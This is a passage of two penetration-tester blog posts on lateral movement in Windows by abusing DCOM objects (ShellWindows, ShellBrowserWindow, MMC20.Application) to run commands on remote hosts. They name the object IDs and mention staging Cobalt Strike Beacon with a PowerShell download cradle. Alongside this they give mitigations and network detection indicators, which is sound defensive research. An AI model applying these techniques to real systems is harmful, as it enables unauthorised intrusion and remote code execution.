Another way to identify potential target objects is to look for the value “LaunchPermission” missing from keys in HKCR:\AppID\{guid}. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format:

launch_permissions_registry

Those with no explicit LaunchPermission set will be missing that specific registry entry.

The first object I explored was the “ShellWindows” instance. Since there is no ProgID associated with this object, we can use the Type.GetTypeFromCLSID .NET method paired with the Activator.CreateInstance method to instantiate the object via its AppID on a remote host. In order to do this, we need to get the AppID CLSID for the ShellWindows object, which can be accomplished using OleView .NET as well:

[Edit] Thanks to @tiraniddo for pointing it out, the instantiation portions should have read “CLSID” instead of “AppID”. This has been corrected below.

[Edit] Replaced screenshot of AppID wit CLSID

shellwindow_classid

As you can see below, the “Launch Permission” field is blank, meaning no explicit permissions are set.

screen-shot-2017-01-23-at-4-12-24-pm

 Now that we have the AppID CLSID, we can instantiate the object on a remote target:

remote_instantiation_shellwindows

With the object instantiated on the remote host, we can interface with it and invoke any methods we want. The returned handle to the object reveals several methods and properties, none of which we can interact with. In order to achieve actual interaction with the remote host, we need to access the WindowsShell.Item method, which will give us back an object that represents the Windows shell window:

item_instantiation

With a full handle on the Shell Window, we can now access all of the expected methods/properties that are exposed. After going through these methods, “Document.Application.ShellExecute” stood out. Be sure to follow the parameter requirements for the method, which are documented here.

shellwindows_command_execution

As you can see above, our command was executed on a remote host successfully.

Now that the “ShellWindows” object was tested and validated, I moved onto the “ShellBrowserWindow” object. One of the first things I noticed was that this particular object does not exist on Windows 7, making its use for lateral movement a bit more limited than the “ShellWindows” object, which I tested on Win7-Win10 successfully. Since the “ShellBrowserWindow” object was tested successfully on Windows 10-Server 2012R2, it should be noted as well.

I took the same enumeration steps on the “ShellBrowserWindow” object as I did with the “ShellWindows” object. Based on my enumeration of this object, it appears to effectively provide an interface into the Explorer window just as the previous object does. To instantiate this object, we need to get its AppID CLSID. Similar to above, we can use OleView .NET:

[Edit] Replaced screenshot of AppID wit CLSID

shellbrowser_classid

Again, take note of the blank Launch Permission field 🙂

screen-shot-2017-01-23-at-4-13-52-pm

With the AppID CLSID, we can repeat the steps taken on the previous object to instantiate the object and call the same method:

shellbrowserwindow_command_execution

As you can see, the command successfully executed on the remote target.

Since this object interfaces directly with the Windows shell, we don’t need to invoke the “ShellWindows.Item” method, as on the previous object.

While these two DCOM objects can be used to run shell commands on a remote host, there are plenty of other interesting methods that can be used to enumerate or tamper with a remote target. A few of these methods include:

  • Document.Application.ServiceStart()
  • Document.Application.ServiceStop()
  • Document.Application.IsServiceRunning()
  • Document.Application.ShutDownWindows()
  • Document.Application.GetSystemInformation()

Defenses

You may ask, what can I do to mitigate or detect these techniques? One option is to enable the Domain Firewall, as this prevents DCOM instantiation by default. While this mitigation works, there are methods for an attacker to tamper with the Windows firewall remotely (one being remotely stopping the service).

There is also the option of changing the default “LaunchPermissions” for all DCOM objects via dcomncfg.exe by right clicking on “My Computer”, selecting “Properties” and selecting “Edit Default” under “Launch and Activation Permissions”. You can then select the Administrators group and uncheck “Remote Launch” and “Remote Activation”:

dcom_default_lockdown

Attempted instantiation of an object results in “Access Denied”:

remote_instantiation_failure

You can also explicitly set the permissions on the suspect DCOM objects to remove RemoteActivate and RemoteLaunch permissions from the Local Administrators group. To do so, you will need to take ownership of the DCOM’s HKCR AppID key, change the permissions via the Component Services MMC snap-in and then change the ownership of the DCOM’s HKCR AppID key back to TrustedInstaller. For example, this is the process of locking down the “ShellWindows” object.

First, take ownership of HKCR:\AppID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}. The GUID will be the AppID of the DCOM object; finding this was discussed above. You can achieve this by going into regedit, right click on the key and select “permissions”. From there, you will find the “ownership” tab under “advanced”.

dcom_registry_ownership

As you can see above, the current owner is “TrustedInstaller”, meaning you can’t currently modify the contents of the key. To take ownership, click “Other Users or Groups” and add “Administrators” if it isn’t already there and click “Apply”:

apply_ownership

Now that you have ownership of the “ShellWindows” AppID key, you will need to make sure the Administrators group has “FullControl” over the AppID key of the DCOM object. Once done, open the “Component Services” MMC snap-in, browse to “ShellWindows”, right click on it and select “Properties”. To modify the Remote Activation and Launch permissions, you will need to go over to the “Security” tab. If you successfully took ownership of AppID key belonging to the DCOM object, the radio buttons for the security options should *not* be grayed out.

edit_default_dcom_perms

To modify the Launch and Activation permissions, click the “edit” button under the “Launch and Activation Permissions” section. Once done, select the Administrators group and uncheck “Remove Activation” and “Remote Launch”. Click “Ok” and then “Apply” to apply the changes.

remove_perms_dcom

Now that the Remote Activation and Launch permissions have been removed from the Administrators group, you will need to give ownership of the AppID key belonging to the DCOM object back to the TrustedInstaller account. To do so, go back to the HKCR:\AppID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39} registry key and navigate back to the “Other Users and Groups” section under the owner tab. To add the TrustedInstaller account back, you will need to change the “Location” to the local host and enter “NT   SERVICE\TrustedInstaller” as the object name:

trustedinstaller_restore

Click “OK” and then “Apply” to change the owner back.

One important note: Since we added “Administrators” the “FullControl” permission to the AppID key belonging to the DCOM object, it is critical to remove that permission by unchecking the “FullControl” box for the Administrators group.  Since the updated DCOM permissions are stored as “LaunchPermission” under that key, an attacker can simply delete that value remotely, opening the DCOM object back up if not properly secured.

After making these changes, you should see that instantiation of that specific DCOM object is no longer allowed remotely:

remote_instantiation_failure

Keep in mind that while this mitigation does restrict the launch permissions of the given DCOM object, an attacker could theoretically remotely take ownership of the key and disable the mitigation since it is stored in the registry.

There is the option of disabling DCOM, which you can read about here. I have not tested to see if this breaks anything at scale, so proceed with caution.

As a reference, the three DCOM objects I have found that allows for remote code execution are as follows:

MMC20.Application (Tested Windows 7, Windows 10, Server 2012R2)
AppID: 7e0423cd-1119-0928-900c-e6d4a52a0715

ShellWindows  (Tested Windows 7, Windows 10, Server 2012R2)
AppID: 9BA05972-F6A8-11CF-A442-00A0C90A8F39

ShellBrowserWindow (Tested Windows 10, Server 2012R2)
AppID: C08AFD90-F2A1-11D1-8455-00A0C91F3880

It should also be noted that there may be other DCOM objects allowing for similar actions performed remotely. These are simply the ones I have found so far.

Full Disclosure: I encourage anyone who implements these mitigations to test them extensively before integrating at scale. As with any system configuration change, it is highly encouraged to extensively test it to ensure nothing breaks. I have not tested these mitigations at scale.

As for detection, there are a few things you can look for from a network level. When running the execution of this technique through Wireshark, you will likely see an influx of DCERPC traffic, followed by some indicators.

First, when the object is instantiated remotely, you may notice a “RemoteGetClassObject” request via ISystemActivator:

isystemactivator_getclassobject

Following that, you will likely see “GetTypeInfo” requests from IDispatch along with “RemQueryInterface” requests via IRemUnknown2:

idispatch_gettypeinfo

While this may, in most cases, look like normal DCOM/RPC traffic (to an extent), one large indicator of this technique being executed will be in a request via IDispatch of GetIDsofNames for “ShellExecute”:

method_enumeration

Immediately following that request, you will see a treasure trove of useful information via an “Invoke Request”, including *exactly* what was executed via the ShellExecute method:

method_params_over_wire

That will immediately be followed by the response code of the method execution (0 being success). This is what the actual execution of commands via this method looks like:

shellexecute_returncode

Cheers!
Matt N.

Lateral Movement using the MMC20.Application COM Object

For those of you who conduct pentests or red team assessments, you are probably aware that there are only so many ways to pivot, or conduct lateral movement to a Windows system. Some of those techniques include psexec, WMI, at, Scheduled Tasks, and WinRM (if enabled). Since there are only a handful of techniques, more mature defenders are likely able to prepare for and detect attackers using them. Due to this, I set out to find an alternate way of pivoting to a remote system.

Recently, I have been digging into COM (Component Object Model) internals. My interest in researching new lateral movement techniques led me to DCOM (Distributed Component Object Model), due to the ability to interact with the objects over the network. Microsoft has some good documentation on DCOM here and on COM here. You can find a solid list of DCOM applications using PowerShell, by running “Get-CimInstance Win32_DCOMApplication”.

While enumerating the different DCOM applications, I came across the MMC Application Class (MMC20.Application). This COM object allows you to script components of MMC snap-in operations. While enumerating the different methods and properties within this COM object, I noticed that there is a method named “ExecuteShellCommand” under Document.ActiveView.

executeshellcommad_method

You can read more on that method here. So far, we have a DCOM application that we can access over the network and can execute commands. The final piece is to leverage this DCOM application and the ExecuteShellCommand method to obtain code execution on a remote host.

Fortunately, as an admin, you can remotely interact with DCOM with PowerShell by using “[activator]::CreateInstance([type]::GetTypeFromProgID”. All you need to do is provide it a DCOM ProgID and an IP address. It will then provide you back an instance of that COM object remotely:remote_instantiation

It is then possible to invoke the “ExecuteShellCommand” method to start a process on the remote host:

start_remote_process

As you can see, calc.exe is running under Matt while the user “Jason” is logged in:

process_validation

By using this DCOM application and the associated method, it is possible to pivot to a remote host without using psexec, WMI, or other well-known techniques.

To further demonstrate this, we can use this technique to execute an agent, such as Cobalt Strike’s Beacon, on a remote host. Since this is a lateral movement technique, it requires administrative privileges on the remote host:

validate_admin_beacon

As you can see, the user “Matt” has local admin rights on “192.168.99.132”. You can then use the ExecuteShellCommand method of MMC20.Application to execute staging code on the remote host. For this example, a simple encoded PowerShell download cradle is specified. Be sure to pay attention to the requirements of “ExecuteShellCommand” as the program and its parameters are separated:

command1

The result of executing this through an agent results in obtaining access to the remote target:

execution

To detect/mitigate this, defenders can disable DCOM, block RPC traffic between workstations, and look for a child process spawning off of “mmc.exe”.

Edit: After some investigating and back & forth with James Forshaw, it appears that the Windows Firewall will block this technique by default. As an additional mitigation, ensure the windows firewall is enabled and “Microsoft Management Console” isn’t an enabled rule.

Cheers!
Matt N.